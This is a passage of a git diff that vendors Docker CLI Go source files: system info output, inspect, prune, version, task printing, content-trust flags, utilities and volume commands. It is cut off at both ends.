History Retention Limit: %d\n", taskHistoryRetentionLimit) + fmt.Fprintf(dockerCli.Out(), " Raft:\n") + fmt.Fprintf(dockerCli.Out(), " Snapshot Interval: %d\n", info.Swarm.Cluster.Spec.Raft.SnapshotInterval) + if info.Swarm.Cluster.Spec.Raft.KeepOldSnapshots != nil { + fmt.Fprintf(dockerCli.Out(), " Number of Old Snapshots to Retain: %d\n", *info.Swarm.Cluster.Spec.Raft.KeepOldSnapshots) + } + fmt.Fprintf(dockerCli.Out(), " Heartbeat Tick: %d\n", info.Swarm.Cluster.Spec.Raft.HeartbeatTick) + fmt.Fprintf(dockerCli.Out(), " Election Tick: %d\n", info.Swarm.Cluster.Spec.Raft.ElectionTick) + fmt.Fprintf(dockerCli.Out(), " Dispatcher:\n") + fmt.Fprintf(dockerCli.Out(), " Heartbeat Period: %s\n", units.HumanDuration(time.Duration(info.Swarm.Cluster.Spec.Dispatcher.HeartbeatPeriod))) + fmt.Fprintf(dockerCli.Out(), " CA Configuration:\n") + fmt.Fprintf(dockerCli.Out(), " Expiry Duration: %s\n", units.HumanDuration(info.Swarm.Cluster.Spec.CAConfig.NodeCertExpiry)) + if len(info.Swarm.Cluster.Spec.CAConfig.ExternalCAs) > 0 { + fmt.Fprintf(dockerCli.Out(), " External CAs:\n") + for _, entry := range info.Swarm.Cluster.Spec.CAConfig.ExternalCAs { + fmt.Fprintf(dockerCli.Out(), " %s: %s\n", entry.Protocol, entry.URL) + } + } + } + fmt.Fprintf(dockerCli.Out(), " Node Address: %s\n", info.Swarm.NodeAddr) + managers := []string{} + for _, entry := range info.Swarm.RemoteManagers { + managers = append(managers, entry.Addr) + } + if len(managers) > 0 { + sort.Strings(managers) + fmt.Fprintf(dockerCli.Out(), " Manager Addresses:\n") + for _, entry := range managers { + fmt.Fprintf(dockerCli.Out(), " %s\n", entry) + } + } + } + + if len(info.Runtimes) > 0 { + fmt.Fprintf(dockerCli.Out(), "Runtimes:") + for name := range info.Runtimes { + fmt.Fprintf(dockerCli.Out(), " %s", name) + } + fmt.Fprint(dockerCli.Out(), "\n") + fmt.Fprintf(dockerCli.Out(), "Default Runtime: %s\n", info.DefaultRuntime) + } + + if info.OSType == "linux" { + fmt.Fprintf(dockerCli.Out(), "Init Binary: %v\n", 
info.InitBinary) + + for _, ci := range []struct { + Name string + Commit types.Commit + }{ + {"containerd", info.ContainerdCommit}, + {"runc", info.RuncCommit}, + {"init", info.InitCommit}, + } { + fmt.Fprintf(dockerCli.Out(), "%s version: %s", ci.Name, ci.Commit.ID) + if ci.Commit.ID != ci.Commit.Expected { + fmt.Fprintf(dockerCli.Out(), " (expected: %s)", ci.Commit.Expected) + } + fmt.Fprintf(dockerCli.Out(), "\n") + } + if len(info.SecurityOptions) != 0 { + kvs, err := types.DecodeSecurityOptions(info.SecurityOptions) + if err != nil { + return err + } + fmt.Fprintf(dockerCli.Out(), "Security Options:\n") + for _, so := range kvs { + fmt.Fprintf(dockerCli.Out(), " %s\n", so.Name) + for _, o := range so.Options { + switch o.Key { + case "profile": + if o.Value != "default" { + fmt.Fprintf(dockerCli.Err(), " WARNING: You're not using the default seccomp profile\n") + } + fmt.Fprintf(dockerCli.Out(), " Profile: %s\n", o.Value) + } + } + } + } + } + + // Isolation only has meaning on a Windows daemon. 
+ if info.OSType == "windows" { + fmt.Fprintf(dockerCli.Out(), "Default Isolation: %v\n", info.Isolation) + } + + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Kernel Version: %s\n", info.KernelVersion) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Operating System: %s\n", info.OperatingSystem) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "OSType: %s\n", info.OSType) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Architecture: %s\n", info.Architecture) + fmt.Fprintf(dockerCli.Out(), "CPUs: %d\n", info.NCPU) + fmt.Fprintf(dockerCli.Out(), "Total Memory: %s\n", units.BytesSize(float64(info.MemTotal))) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Name: %s\n", info.Name) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "ID: %s\n", info.ID) + fmt.Fprintf(dockerCli.Out(), "Docker Root Dir: %s\n", info.DockerRootDir) + fmt.Fprintf(dockerCli.Out(), "Debug Mode (client): %v\n", utils.IsDebugEnabled()) + fmt.Fprintf(dockerCli.Out(), "Debug Mode (server): %v\n", info.Debug) + + if info.Debug { + fmt.Fprintf(dockerCli.Out(), " File Descriptors: %d\n", info.NFd) + fmt.Fprintf(dockerCli.Out(), " Goroutines: %d\n", info.NGoroutines) + fmt.Fprintf(dockerCli.Out(), " System Time: %s\n", info.SystemTime) + fmt.Fprintf(dockerCli.Out(), " EventsListeners: %d\n", info.NEventsListener) + } + + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Http Proxy: %s\n", info.HTTPProxy) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Https Proxy: %s\n", info.HTTPSProxy) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "No Proxy: %s\n", info.NoProxy) + + if info.IndexServerAddress != "" { + u := dockerCli.ConfigFile().AuthConfigs[info.IndexServerAddress].Username + if len(u) > 0 { + fmt.Fprintf(dockerCli.Out(), "Username: %v\n", u) + } + fmt.Fprintf(dockerCli.Out(), "Registry: %v\n", info.IndexServerAddress) + } + + // Only output these warnings if the server does not support these features + if info.OSType != "windows" { + if !info.MemoryLimit { + fmt.Fprintln(dockerCli.Err(), "WARNING: No memory limit support") + 
} + if !info.SwapLimit { + fmt.Fprintln(dockerCli.Err(), "WARNING: No swap limit support") + } + if !info.KernelMemory { + fmt.Fprintln(dockerCli.Err(), "WARNING: No kernel memory limit support") + } + if !info.OomKillDisable { + fmt.Fprintln(dockerCli.Err(), "WARNING: No oom kill disable support") + } + if !info.CPUCfsQuota { + fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu cfs quota support") + } + if !info.CPUCfsPeriod { + fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu cfs period support") + } + if !info.CPUShares { + fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu shares support") + } + if !info.CPUSet { + fmt.Fprintln(dockerCli.Err(), "WARNING: No cpuset support") + } + if !info.IPv4Forwarding { + fmt.Fprintln(dockerCli.Err(), "WARNING: IPv4 forwarding is disabled") + } + if !info.BridgeNfIptables { + fmt.Fprintln(dockerCli.Err(), "WARNING: bridge-nf-call-iptables is disabled") + } + if !info.BridgeNfIP6tables { + fmt.Fprintln(dockerCli.Err(), "WARNING: bridge-nf-call-ip6tables is disabled") + } + } + + if info.Labels != nil { + fmt.Fprintln(dockerCli.Out(), "Labels:") + for _, attribute := range info.Labels { + fmt.Fprintf(dockerCli.Out(), " %s\n", attribute) + } + // TODO: Engine labels with duplicate keys has been deprecated in 1.13 and will be error out + // after 3 release cycles (1.16). For now, a WARNING will be generated. The following will + // be removed eventually. 
+ labelMap := map[string]string{} + for _, label := range info.Labels { + stringSlice := strings.SplitN(label, "=", 2) + if len(stringSlice) > 1 { + // If there is a conflict we will throw out an warning + if v, ok := labelMap[stringSlice[0]]; ok && v != stringSlice[1] { + fmt.Fprintln(dockerCli.Err(), "WARNING: labels with duplicate keys and conflicting values have been deprecated") + break + } + labelMap[stringSlice[0]] = stringSlice[1] + } + } + } + + fmt.Fprintf(dockerCli.Out(), "Experimental: %v\n", info.ExperimentalBuild) + if info.ClusterStore != "" { + fmt.Fprintf(dockerCli.Out(), "Cluster Store: %s\n", info.ClusterStore) + } + + if info.ClusterAdvertise != "" { + fmt.Fprintf(dockerCli.Out(), "Cluster Advertise: %s\n", info.ClusterAdvertise) + } + + if info.RegistryConfig != nil && (len(info.RegistryConfig.InsecureRegistryCIDRs) > 0 || len(info.RegistryConfig.IndexConfigs) > 0) { + fmt.Fprintln(dockerCli.Out(), "Insecure Registries:") + for _, registry := range info.RegistryConfig.IndexConfigs { + if registry.Secure == false { + fmt.Fprintf(dockerCli.Out(), " %s\n", registry.Name) + } + } + + for _, registry := range info.RegistryConfig.InsecureRegistryCIDRs { + mask, _ := registry.Mask.Size() + fmt.Fprintf(dockerCli.Out(), " %s/%d\n", registry.IP.String(), mask) + } + } + + if info.RegistryConfig != nil && len(info.RegistryConfig.Mirrors) > 0 { + fmt.Fprintln(dockerCli.Out(), "Registry Mirrors:") + for _, mirror := range info.RegistryConfig.Mirrors { + fmt.Fprintf(dockerCli.Out(), " %s\n", mirror) + } + } + + fmt.Fprintf(dockerCli.Out(), "Live Restore Enabled: %v\n", info.LiveRestoreEnabled) + + return nil +} + +func formatInfo(dockerCli *command.DockerCli, info types.Info, format string) error { + tmpl, err := templates.Parse(format) + if err != nil { + return cli.StatusError{StatusCode: 64, + Status: "Template parsing error: " + err.Error()} + } + err = tmpl.Execute(dockerCli.Out(), info) + dockerCli.Out().Write([]byte{'\n'}) + return err +} diff --git 
a/vendor/github.com/docker/docker/cli/command/system/inspect.go b/vendor/github.com/docker/docker/cli/command/system/inspect.go new file mode 100644 index 0000000000..c86e858a29 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/inspect.go @@ -0,0 +1,203 @@ +package system + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + apiclient "github.com/docker/docker/client" + "github.com/spf13/cobra" +) + +type inspectOptions struct { + format string + inspectType string + size bool + ids []string +} + +// NewInspectCommand creates a new cobra.Command for `docker inspect` +func NewInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] NAME|ID [NAME|ID...]", + Short: "Return low-level information on Docker objects", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.ids = args + return runInspect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + flags.StringVar(&opts.inspectType, "type", "", "Return JSON for specified type") + flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes if the type is container") + + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + var elementSearcher inspect.GetRefFunc + switch opts.inspectType { + case "", "container", "image", "node", "network", "service", "volume", "task", "plugin": + elementSearcher = inspectAll(context.Background(), dockerCli, opts.size, opts.inspectType) + default: + return fmt.Errorf("%q is not a valid value for --type", opts.inspectType) + } + return inspect.Inspect(dockerCli.Out(), opts.ids, opts.format, elementSearcher) +} + +func inspectContainers(ctx context.Context, 
dockerCli *command.DockerCli, getSize bool) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().ContainerInspectWithRaw(ctx, ref, getSize) + } +} + +func inspectImages(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().ImageInspectWithRaw(ctx, ref) + } +} + +func inspectNetwork(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().NetworkInspectWithRaw(ctx, ref) + } +} + +func inspectNode(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().NodeInspectWithRaw(ctx, ref) + } +} + +func inspectService(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().ServiceInspectWithRaw(ctx, ref) + } +} + +func inspectTasks(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().TaskInspectWithRaw(ctx, ref) + } +} + +func inspectVolume(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().VolumeInspectWithRaw(ctx, ref) + } +} + +func inspectPlugin(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { + return func(ref string) (interface{}, []byte, error) { + return dockerCli.Client().PluginInspectWithRaw(ctx, ref) + } +} + +func inspectAll(ctx context.Context, dockerCli *command.DockerCli, getSize bool, typeConstraint string) inspect.GetRefFunc { + var inspectAutodetect = []struct { + objectType string + isSizeSupported bool + isSwarmObject bool + objectInspector func(string) (interface{}, []byte, 
error) + }{ + { + objectType: "container", + isSizeSupported: true, + objectInspector: inspectContainers(ctx, dockerCli, getSize), + }, + { + objectType: "image", + objectInspector: inspectImages(ctx, dockerCli), + }, + { + objectType: "network", + objectInspector: inspectNetwork(ctx, dockerCli), + }, + { + objectType: "volume", + objectInspector: inspectVolume(ctx, dockerCli), + }, + { + objectType: "service", + isSwarmObject: true, + objectInspector: inspectService(ctx, dockerCli), + }, + { + objectType: "task", + isSwarmObject: true, + objectInspector: inspectTasks(ctx, dockerCli), + }, + { + objectType: "node", + isSwarmObject: true, + objectInspector: inspectNode(ctx, dockerCli), + }, + { + objectType: "plugin", + objectInspector: inspectPlugin(ctx, dockerCli), + }, + } + + // isSwarmManager does an Info API call to verify that the daemon is + // a swarm manager. + isSwarmManager := func() bool { + info, err := dockerCli.Client().Info(ctx) + if err != nil { + fmt.Fprintln(dockerCli.Err(), err) + return false + } + return info.Swarm.ControlAvailable + } + + isErrNotSupported := func(err error) bool { + return strings.Contains(err.Error(), "not supported") + } + + return func(ref string) (interface{}, []byte, error) { + const ( + swarmSupportUnknown = iota + swarmSupported + swarmUnsupported + ) + + isSwarmSupported := swarmSupportUnknown + + for _, inspectData := range inspectAutodetect { + if typeConstraint != "" && inspectData.objectType != typeConstraint { + continue + } + if typeConstraint == "" && inspectData.isSwarmObject { + if isSwarmSupported == swarmSupportUnknown { + if isSwarmManager() { + isSwarmSupported = swarmSupported + } else { + isSwarmSupported = swarmUnsupported + } + } + if isSwarmSupported == swarmUnsupported { + continue + } + } + v, raw, err := inspectData.objectInspector(ref) + if err != nil { + if typeConstraint == "" && (apiclient.IsErrNotFound(err) || isErrNotSupported(err)) { + continue + } + return v, raw, err + } + if getSize && 
!inspectData.isSizeSupported { + fmt.Fprintf(dockerCli.Err(), "WARNING: --size ignored for %s\n", inspectData.objectType) + } + return v, raw, err + } + return nil, nil, fmt.Errorf("Error: No such object: %s", ref) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/system/prune.go b/vendor/github.com/docker/docker/cli/command/system/prune.go new file mode 100644 index 0000000000..92dddbdca6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/prune.go @@ -0,0 +1,93 @@ +package system + +import ( + "fmt" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/prune" + units "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type pruneOptions struct { + force bool + all bool +} + +// NewPruneCommand creates a new cobra.Command for `docker prune` +func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pruneOptions + + cmd := &cobra.Command{ + Use: "prune [OPTIONS]", + Short: "Remove unused data", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runPrune(dockerCli, opts) + }, + Tags: map[string]string{"version": "1.25"}, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") + flags.BoolVarP(&opts.all, "all", "a", false, "Remove all unused images not just dangling ones") + + return cmd +} + +const ( + warning = `WARNING! 
This will remove: + - all stopped containers + - all volumes not used by at least one container + - all networks not used by at least one container + %s +Are you sure you want to continue?` + + danglingImageDesc = "- all dangling images" + allImageDesc = `- all images without at least one container associated to them` +) + +func runPrune(dockerCli *command.DockerCli, opts pruneOptions) error { + var message string + + if opts.all { + message = fmt.Sprintf(warning, allImageDesc) + } else { + message = fmt.Sprintf(warning, danglingImageDesc) + } + + if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), message) { + return nil + } + + var spaceReclaimed uint64 + + for _, pruneFn := range []func(dockerCli *command.DockerCli) (uint64, string, error){ + prune.RunContainerPrune, + prune.RunVolumePrune, + prune.RunNetworkPrune, + } { + spc, output, err := pruneFn(dockerCli) + if err != nil { + return err + } + spaceReclaimed += spc + if output != "" { + fmt.Fprintln(dockerCli.Out(), output) + } + } + + spc, output, err := prune.RunImagePrune(dockerCli, opts.all) + if err != nil { + return err + } + if spc > 0 { + spaceReclaimed += spc + fmt.Fprintln(dockerCli.Out(), output) + } + + fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/system/version.go b/vendor/github.com/docker/docker/cli/command/system/version.go new file mode 100644 index 0000000000..ded4f4d118 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/version.go @@ -0,0 +1,113 @@ +package system + +import ( + "fmt" + "runtime" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/utils/templates" + "github.com/spf13/cobra" +) + +var versionTemplate = `Client: + Version: 
{{.Client.Version}} + API version: {{.Client.APIVersion}} + Go version: {{.Client.GoVersion}} + Git commit: {{.Client.GitCommit}} + Built: {{.Client.BuildTime}} + OS/Arch: {{.Client.Os}}/{{.Client.Arch}}{{if .ServerOK}} + +Server: + Version: {{.Server.Version}} + API version: {{.Server.APIVersion}} (minimum version {{.Server.MinAPIVersion}}) + Go version: {{.Server.GoVersion}} + Git commit: {{.Server.GitCommit}} + Built: {{.Server.BuildTime}} + OS/Arch: {{.Server.Os}}/{{.Server.Arch}} + Experimental: {{.Server.Experimental}}{{end}}` + +type versionOptions struct { + format string +} + +// NewVersionCommand creates a new cobra.Command for `docker version` +func NewVersionCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts versionOptions + + cmd := &cobra.Command{ + Use: "version [OPTIONS]", + Short: "Show the Docker version information", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runVersion(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + + return cmd +} + +func runVersion(dockerCli *command.DockerCli, opts *versionOptions) error { + ctx := context.Background() + + templateFormat := versionTemplate + if opts.format != "" { + templateFormat = opts.format + } + + tmpl, err := templates.Parse(templateFormat) + if err != nil { + return cli.StatusError{StatusCode: 64, + Status: "Template parsing error: " + err.Error()} + } + + APIVersion := dockerCli.Client().ClientVersion() + if defaultAPIVersion := dockerCli.DefaultVersion(); APIVersion != defaultAPIVersion { + APIVersion = fmt.Sprintf("%s (downgraded from %s)", APIVersion, defaultAPIVersion) + } + + vd := types.VersionResponse{ + Client: &types.Version{ + Version: dockerversion.Version, + APIVersion: APIVersion, + GoVersion: runtime.Version(), + GitCommit: dockerversion.GitCommit, + BuildTime: dockerversion.BuildTime, + Os: runtime.GOOS, + Arch: 
runtime.GOARCH, + }, + } + + serverVersion, err := dockerCli.Client().ServerVersion(ctx) + if err == nil { + vd.Server = &serverVersion + } + + // first we need to make BuildTime more human friendly + t, errTime := time.Parse(time.RFC3339Nano, vd.Client.BuildTime) + if errTime == nil { + vd.Client.BuildTime = t.Format(time.ANSIC) + } + + if vd.ServerOK() { + t, errTime = time.Parse(time.RFC3339Nano, vd.Server.BuildTime) + if errTime == nil { + vd.Server.BuildTime = t.Format(time.ANSIC) + } + } + + if err2 := tmpl.Execute(dockerCli.Out(), vd); err2 != nil && err == nil { + err = err2 + } + dockerCli.Out().Write([]byte{'\n'}) + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/task/print.go b/vendor/github.com/docker/docker/cli/command/task/print.go new file mode 100644 index 0000000000..0f1c2cf724 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/task/print.go @@ -0,0 +1,161 @@ +package task + +import ( + "fmt" + "io" + "sort" + "strings" + "text/tabwriter" + "time" + + "golang.org/x/net/context" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/idresolver" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/go-units" +) + +const ( + psTaskItemFmt = "%s\t%s\t%s\t%s\t%s\t%s %s ago\t%s\t%s\n" + maxErrLength = 30 +) + +type portStatus swarm.PortStatus + +func (ps portStatus) String() string { + if len(ps.Ports) == 0 { + return "" + } + + str := fmt.Sprintf("*:%d->%d/%s", ps.Ports[0].PublishedPort, ps.Ports[0].TargetPort, ps.Ports[0].Protocol) + for _, pConfig := range ps.Ports[1:] { + str += fmt.Sprintf(",*:%d->%d/%s", pConfig.PublishedPort, pConfig.TargetPort, pConfig.Protocol) + } + + return str +} + +type tasksBySlot []swarm.Task + +func (t tasksBySlot) Len() int { + return len(t) +} + +func (t tasksBySlot) Swap(i, j int) { + t[i], t[j] = t[j], t[i] +} + +func (t tasksBySlot) Less(i, j 
int) bool { + // Sort by slot. + if t[i].Slot != t[j].Slot { + return t[i].Slot < t[j].Slot + } + + // If same slot, sort by most recent. + return t[j].Meta.CreatedAt.Before(t[i].CreatedAt) +} + +// Print task information in a table format. +// Besides this, command `docker node ps ` +// and `docker stack ps` will call this, too. +func Print(dockerCli *command.DockerCli, ctx context.Context, tasks []swarm.Task, resolver *idresolver.IDResolver, noTrunc bool) error { + sort.Stable(tasksBySlot(tasks)) + + writer := tabwriter.NewWriter(dockerCli.Out(), 0, 4, 2, ' ', 0) + + // Ignore flushing errors + defer writer.Flush() + fmt.Fprintln(writer, strings.Join([]string{"ID", "NAME", "IMAGE", "NODE", "DESIRED STATE", "CURRENT STATE", "ERROR", "PORTS"}, "\t")) + + if err := print(writer, ctx, tasks, resolver, noTrunc); err != nil { + return err + } + + return nil +} + +// PrintQuiet shows task list in a quiet way. +func PrintQuiet(dockerCli *command.DockerCli, tasks []swarm.Task) error { + sort.Stable(tasksBySlot(tasks)) + + out := dockerCli.Out() + + for _, task := range tasks { + fmt.Fprintln(out, task.ID) + } + + return nil +} + +func print(out io.Writer, ctx context.Context, tasks []swarm.Task, resolver *idresolver.IDResolver, noTrunc bool) error { + prevName := "" + for _, task := range tasks { + id := task.ID + if !noTrunc { + id = stringid.TruncateID(id) + } + + serviceName, err := resolver.Resolve(ctx, swarm.Service{}, task.ServiceID) + if err != nil { + return err + } + + nodeValue, err := resolver.Resolve(ctx, swarm.Node{}, task.NodeID) + if err != nil { + return err + } + + name := "" + if task.Slot != 0 { + name = fmt.Sprintf("%v.%v", serviceName, task.Slot) + } else { + name = fmt.Sprintf("%v.%v", serviceName, task.NodeID) + } + + // Indent the name if necessary + indentedName := name + if name == prevName { + indentedName = fmt.Sprintf(" \\_ %s", indentedName) + } + prevName = name + + // Trim and quote the error message. 
+ taskErr := task.Status.Err + if !noTrunc && len(taskErr) > maxErrLength { + taskErr = fmt.Sprintf("%s…", taskErr[:maxErrLength-1]) + } + if len(taskErr) > 0 { + taskErr = fmt.Sprintf("\"%s\"", taskErr) + } + + image := task.Spec.ContainerSpec.Image + if !noTrunc { + ref, err := distreference.ParseNamed(image) + if err == nil { + // update image string for display + namedTagged, ok := ref.(distreference.NamedTagged) + if ok { + image = namedTagged.Name() + ":" + namedTagged.Tag() + } + } + } + + fmt.Fprintf( + out, + psTaskItemFmt, + id, + indentedName, + image, + nodeValue, + command.PrettyPrint(task.DesiredState), + command.PrettyPrint(task.Status.State), + strings.ToLower(units.HumanDuration(time.Since(task.Status.Timestamp))), + taskErr, + portStatus(task.Status.PortStatus), + ) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/trust.go b/vendor/github.com/docker/docker/cli/command/trust.go new file mode 100644 index 0000000000..b4c8a84ee5 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/trust.go @@ -0,0 +1,39 @@ +package command + +import ( + "os" + "strconv" + + "github.com/spf13/pflag" +) + +var ( + // TODO: make this not global + untrusted bool +) + +// AddTrustedFlags adds content trust flags to the current command flagset +func AddTrustedFlags(fs *pflag.FlagSet, verify bool) { + trusted, message := setupTrustedFlag(verify) + fs.BoolVar(&untrusted, "disable-content-trust", !trusted, message) +} + +func setupTrustedFlag(verify bool) (bool, string) { + var trusted bool + if e := os.Getenv("DOCKER_CONTENT_TRUST"); e != "" { + if t, err := strconv.ParseBool(e); t || err != nil { + // treat any other value as true + trusted = true + } + } + message := "Skip image signing" + if verify { + message = "Skip image verification" + } + return trusted, message +} + +// IsTrusted returns true if content trust is enabled +func IsTrusted() bool { + return !untrusted +} diff --git 
a/vendor/github.com/docker/docker/cli/command/utils.go b/vendor/github.com/docker/docker/cli/command/utils.go new file mode 100644 index 0000000000..1837ca41f0 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/utils.go @@ -0,0 +1,87 @@ +package command + +import ( + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "strings" +) + +// CopyToFile writes the content of the reader to the specified file +func CopyToFile(outfile string, r io.Reader) error { + tmpFile, err := ioutil.TempFile(filepath.Dir(outfile), ".docker_temp_") + if err != nil { + return err + } + + tmpPath := tmpFile.Name() + + _, err = io.Copy(tmpFile, r) + tmpFile.Close() + + if err != nil { + os.Remove(tmpPath) + return err + } + + if err = os.Rename(tmpPath, outfile); err != nil { + os.Remove(tmpPath) + return err + } + + return nil +} + +// capitalizeFirst capitalizes the first character of string +func capitalizeFirst(s string) string { + switch l := len(s); l { + case 0: + return s + case 1: + return strings.ToLower(s) + default: + return strings.ToUpper(string(s[0])) + strings.ToLower(s[1:]) + } +} + +// PrettyPrint outputs arbitrary data for human formatted output by uppercasing the first letter. +func PrettyPrint(i interface{}) string { + switch t := i.(type) { + case nil: + return "None" + case string: + return capitalizeFirst(t) + default: + return capitalizeFirst(fmt.Sprintf("%s", t)) + } +} + +// PromptForConfirmation requests and checks confirmation from user. +// This will display the provided message followed by ' [y/N] '. If +// the user input 'y' or 'Y' it returns true other false. If no +// message is provided "Are you sure you want to proceed? [y/N] " +// will be used instead. +func PromptForConfirmation(ins *InStream, outs *OutStream, message string) bool { + if message == "" { + message = "Are you sure you want to proceed?" + } + message += " [y/N] " + + fmt.Fprintf(outs, message) + + // On Windows, force the use of the regular OS stdin stream. 
+ if runtime.GOOS == "windows" { + ins = NewInStream(os.Stdin) + } + + answer := "" + n, _ := fmt.Fscan(ins, &answer) + if n != 1 || (answer != "y" && answer != "Y") { + return false + } + + return true +} diff --git a/vendor/github.com/docker/docker/cli/command/volume/cmd.go b/vendor/github.com/docker/docker/cli/command/volume/cmd.go new file mode 100644 index 0000000000..40862f29d1 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/volume/cmd.go @@ -0,0 +1,45 @@ +package volume + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewVolumeCommand returns a cobra command for `volume` subcommands +func NewVolumeCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "volume COMMAND", + Short: "Manage volumes", + Long: volumeDescription, + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + newCreateCommand(dockerCli), + newInspectCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + NewPruneCommand(dockerCli), + ) + return cmd +} + +var volumeDescription = ` +The **docker volume** command has subcommands for managing data volumes. A data +volume is a specially-designated directory that by-passes storage driver +management. + +Data volumes persist data independent of a container's life cycle. When you +delete a container, the Docker daemon does not delete any data volumes. You can +share volumes across multiple containers. Moreover, you can share data volumes +with other computing resources in your system. + +To see help for a subcommand, use: + + docker volume COMMAND --help + +For full details on using docker volume visit Docker's online documentation. 
+ +` diff --git a/vendor/github.com/docker/docker/cli/command/volume/create.go b/vendor/github.com/docker/docker/cli/command/volume/create.go new file mode 100644 index 0000000000..7b2a7e3318 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/volume/create.go @@ -0,0 +1,111 @@ +package volume + +import ( + "fmt" + + "golang.org/x/net/context" + + volumetypes "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" +) + +type createOptions struct { + name string + driver string + driverOpts opts.MapOpts + labels opts.ListOpts +} + +func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := createOptions{ + driverOpts: *opts.NewMapOpts(nil, nil), + labels: opts.NewListOpts(runconfigopts.ValidateEnv), + } + + cmd := &cobra.Command{ + Use: "create [OPTIONS] [VOLUME]", + Short: "Create a volume", + Long: createDescription, + Args: cli.RequiresMaxArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + if len(args) == 1 { + if opts.name != "" { + fmt.Fprint(dockerCli.Err(), "Conflicting options: either specify --name or provide positional arg, not both\n") + return cli.StatusError{StatusCode: 1} + } + opts.name = args[0] + } + return runCreate(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.StringVarP(&opts.driver, "driver", "d", "local", "Specify volume driver name") + flags.StringVar(&opts.name, "name", "", "Specify volume name") + flags.Lookup("name").Hidden = true + flags.VarP(&opts.driverOpts, "opt", "o", "Set driver specific options") + flags.Var(&opts.labels, "label", "Set metadata for a volume") + + return cmd +} + +func runCreate(dockerCli *command.DockerCli, opts createOptions) error { + client := dockerCli.Client() + + volReq := volumetypes.VolumesCreateBody{ + Driver: opts.driver, + DriverOpts: opts.driverOpts.GetAll(), + Name: 
